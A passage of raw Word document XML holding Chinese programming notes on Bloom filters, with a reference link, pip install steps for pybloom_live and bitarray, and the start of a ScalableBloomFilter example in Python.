        <w:t>，可以根据预期元素数量</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> n </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>与</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ε</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来推导出最合适的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> m </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>与</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> k </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37D623B8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="6F492D47" wp14:editId="655AFA98">
            <wp:extent cx="1668780" cy="457200"/>
            <wp:effectExtent l="0" t="0" r="762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53"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1668780" cy="457200"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D250C02" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="6E4C9885" wp14:editId="0B841776">
            <wp:extent cx="914400" cy="396240"/>
            <wp:effectExtent l="0" t="0" r="0" b="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254"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="914400" cy="396240"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="014A6B1E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1EFC0ED4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46D1A5F2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73D80C77" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>布隆过滤器原理</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="426327C4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:hyperlink r:id="rId255" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a5"/>
          </w:rPr>
          <w:t>https://baike.baidu.com/item/%E5%B8%83%E9%9A%86%E8%BF%87%E6%BB%A4%E5%99%A8/5384697</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="70F971D4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C90B3E0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="765" w:name="_Toc159780191"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:t>pybloom_live</w:t>
      </w:r>
      <w:bookmarkEnd w:id="765"/>
    </w:p>
    <w:p w14:paraId="4651548B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39252CDE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  #python3.6 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安装</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6237085A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  #</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>需要先安装</w:t>
      </w:r>
      <w:bookmarkStart w:id="766" w:name="OLE_LINK23"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>bitarray</w:t>
      </w:r>
      <w:bookmarkEnd w:id="766"/>
    </w:p>
    <w:p w14:paraId="74485E60" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  pip3 install bitarray-0.8.1-cp36-cp36m-win_amd64.whl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>pybloom_live</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>依赖这个包，需要先安装）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1759887B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  #</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下载地址：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>https://www.lfd.uci.edu/~gohlke/pythonlibs/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60D5970C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  pip3 install pybloom_live</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D108252" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D647142" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>示例</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1159D95B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3EF42C95" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="F6F6F6"/>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="default"/>
          <w:color w:val="121212"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F6F6F6"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="999999"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F6F6F6"/>
        </w:rPr>
        <w:t>#ScalableBloomFilter 可以自动扩容</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="385F36A2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="F6F6F6"/>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="default"/>
          <w:color w:val="121212"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F6F6F6"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="default"/>
          <w:color w:val="121212"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F6F6F6"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:bookmarkStart w:id="767" w:name="OLE_LINK24"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="121212"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F6F6F6"/>
        </w:rPr>
        <w:t>from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="default"/>
          <w:color w:val="121212"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F6F6F6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="default"/>
          <w:color w:val="646464"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F6F6F6"/>
        </w:rPr>
        <w:t>pybloom_live</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="default"/>
          <w:color w:val="121212"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F6F6F6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="121212"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F6F6F6"/>
        </w:rPr>
        <w:t>import</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="default"/>
          <w:color w:val="121212"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F6F6F6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="default"/>
          <w:color w:val="121212"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F6F6F6"/>
        </w:rPr>
        <w:t>ScalableBloomFilter</w:t>
      </w:r>
      <w:bookmarkEnd w:id="767"/>
    </w:p>
    <w:p w14:paraId="37BFAAE9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="F6F6F6"/>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="default"/>
          <w:color w:val="121212"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F6F6F6"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="default"/>
          <w:color w:val="121212"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F6F6F6"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="default"/>
          <w:color w:val="F1403C"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F6F6F6"/>
        </w:rPr>
        <w:t>​</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F0C801D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="F6F6F6"/>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="default"/>
          <w:color w:val="121212"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F6F6F6"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="default"/>
          <w:color w:val="121212"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F6F6F6"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="default"/>
          <w:color w:val="F1403C"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F6F6F6"/>
        </w:rPr>
        <w:t>​</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D9BBFB6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="F6F6F6"/>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="default"/>
          <w:color w:val="121212"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F6F6F6"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="default"/>
          <w:color w:val="121212"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F6F6F6"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:bookmarkStart w:id="768" w:name="OLE_LINK25"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="default"/>
          <w:color w:val="121212"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F6F6F6"/>
        </w:rPr>
        <w:t>bloom</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="default"/>
          <w:color w:val="121212"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F6F6F6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="121212"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F6F6F6"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="default"/>
          <w:color w:val="121212"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F6F6F6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="default"/>
          <w:color w:val="121212"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F6F6F6"/>
        </w:rPr>
        <w:t>ScalableBloomFilter(initial_capacity</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="121212"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F6F6F6"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="default"/>
          <w:color w:val="056DE8"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F6F6F6"/>
        </w:rPr>
        <w:t>100</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="default"/>
          <w:color w:val="121212"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F6F6F6"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="default"/>
          <w:color w:val="121212"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F6F6F6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="default"/>
          <w:color w:val="121212"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F6F6F6"/>
        </w:rPr>
        <w:t>error_rate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="121212"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F6F6F6"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="default"/>
          <w:color w:val="056DE8"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F6F6F6"/>
        </w:rPr>
        <w:t>0.001</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="default"/>
          <w:color w:val="121212"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F6F6F6"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="default"/>
          <w:color w:val="121212"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F6F6F6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="default"/>
          <w:color w:val="121212"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F6F6F6"/>
        </w:rPr>
        <w:t>mode</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="121212"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F6F6F6"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="default"/>
          <w:color w:val="121212"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F6F6F6"/>
        </w:rPr>
        <w:t>ScalableBloomFilter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="121212"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F6F6F6"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="default"/>
          <w:color w:val="121212"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F6F6F6"/>
        </w:rPr>
        <w:t>LARGE_SET_GROWTH)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B168787" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="F6F6F6"/>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="default"/>
          <w:color w:val="121212"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F6F6F6"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="default"/>
          <w:color w:val="121212"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F6F6F6"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="default"/>
          <w:color w:val="F1403C"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F6F6F6"/>
        </w:rPr>
        <w:t>​</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A5A1ACA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="F6F6F6"/>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="default"/>
          <w:color w:val="121212"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F6F6F6"/>
